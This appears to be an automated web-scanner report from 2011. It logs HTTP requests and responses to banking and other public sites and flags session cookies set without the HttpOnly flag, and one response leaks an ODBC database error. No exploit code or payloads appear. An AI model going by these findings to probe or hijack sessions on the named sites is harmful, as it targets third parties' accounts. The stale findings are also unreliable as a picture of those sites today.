GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Small+Business HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Homepage.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/NCProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/ProductsAndService.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/Solutions.do HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/depositRates/init.app HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webapp/unsec/homeEquity/init.app HTTP/1.1 Host: www.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.retirementgold.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 156 Content-Type: text/html Location: https://www.retirementgold.com/fnbo Set-Cookie: ASPSESSIONIDAAQSTCQQ=GLLJBHGAIDPLDGIHHBMDKOAH; path=/ Date: Wed, 02 Feb 2011 22:20:27 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="https://www.retirementgold.com/fnbo">here</a>.</body>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pnc/ HTTP/1.1 Host: www.smart-hsa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pnc/ HTTP/1.1 Host: www.smart-hsa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news_detail.asp HTTP/1.1 Host: www.thestandard.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 03 Feb 2011 01:17:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 339 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSCSSRSQ=JECBPJKAJCJNPMKCCLGBEBJC; path=/ Cache-control: private
<html>
<HTML> <font face="Arial" size=2> <p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e21'</font> <p> <font face="Arial" size=2>ODBC driver does no ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /transactionservices/home/ HTTP/1.1 Host: www.transactionservices.citigroup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:20:31 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=tMY9NJYPQF122mSCD1GNnsZQnSSyyv3QpvnSKh2Ypv5JW6nqjhxH!-455328445; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /transactionservices/home/tts/ HTTP/1.1 Host: www.transactionservices.citigroup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:20:30 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=0yg9NJYTFn3FQBd5JQK18jnv4gSG01x3vm7SW1QsyXG3TzWNSck0!-455328445; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.transunion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:20:31 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000QTy7kEmBMIWQOU_kw9iWUqa:11ele8d69; Path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 23735
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>TransUnion - Check Your ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=h5pmndrdvp301roj3gb031t642; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/ HTTP/1.1 Host: www.upi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:17:32 GMT Server: Apache/2.2.15 (Unix) PHP/5.3.3 X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=h5pmndrdvp301roj3gb031t642; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 66058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Blue fin tuna ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 23:45:27 GMT Expires: -1 Pragma: no-cache Set-Cookie: vglnk.Agent.p=38d8b11a817b037b4b6a4f8ea1982e0a; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 23:45:27 GMT; Path=/ Set-Cookie: JSESSIONID=850E1DB3E66B214055AFE3AAEB898474; Path=/ Vary: Accept-Encoding Connection: Close Content-Length: 14626
<!doctype html> <html lang="en" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title>Affiliate Every Link on the Web with VigLink</title>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /globalgateway/main.jsp HTTP/1.1 Host: www.visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /enroll HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espanol HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /foundation/v/index.jsp HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /helpcenter HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home-equity HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inside HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /legal HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacyandsecurity HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /retirementlogin HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /savings/featured-cd.html HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /securityplus HTTP/1.1 Host: www.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.webveteran.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=8283151;expires=Fri, 25-Jan-2041 23:45:08 GMT;path=/ Set-Cookie: CFTOKEN=bf0ce741d922432b-17A7490E-5056-A306-AF9E960E65180C8B;expires=Fri, 25-Jan-2041 23:45:08 GMT;path=/ Set-Cookie: SKIP=1;expires=Wed, 09-Feb-2011 23:45:08 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=EF949CC12A6233AB
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 7829 Set-Cookie: JSESSIONIDRIB011=0000QfeDKqBzExihl0t6Sl1rbNV:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 7828 Set-Cookie: JSESSIONIDRIB09=0000FrNgyz_FdPFwsTt_iMc_-lN:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/RequestRouter?requestCmdId=DisplayLoginPage HTTP/1.1 Host: www4.usbank.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:00:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Set-Cookie: JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; Path=/internetBanking Set-Cookie: CAMPID=""; Expires=Sat, 02 Feb 2041 04:23:43 GMT; Path=/; Domain=.usbank.com Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14681 Set-Cookie: JSESSIONIDRIB09=0000K4E52Qoy6PbGS6Z06RA5tSI:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14682 Set-Cookie: JSESSIONIDRIB011=0000ggpvqAphewOgNOFlO8lrK0H:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1 Host: www4.usbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 23:45:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html;charset=ISO-8859-1 Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Content-Language: en-US Content-Length: 14538 Set-Cookie: JSESSIONIDRIB011=0000AgcxpIllPHFlV7I1C0_htWM:-1; Path=/internetBanking Server: WebSphere Application Server/6.1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
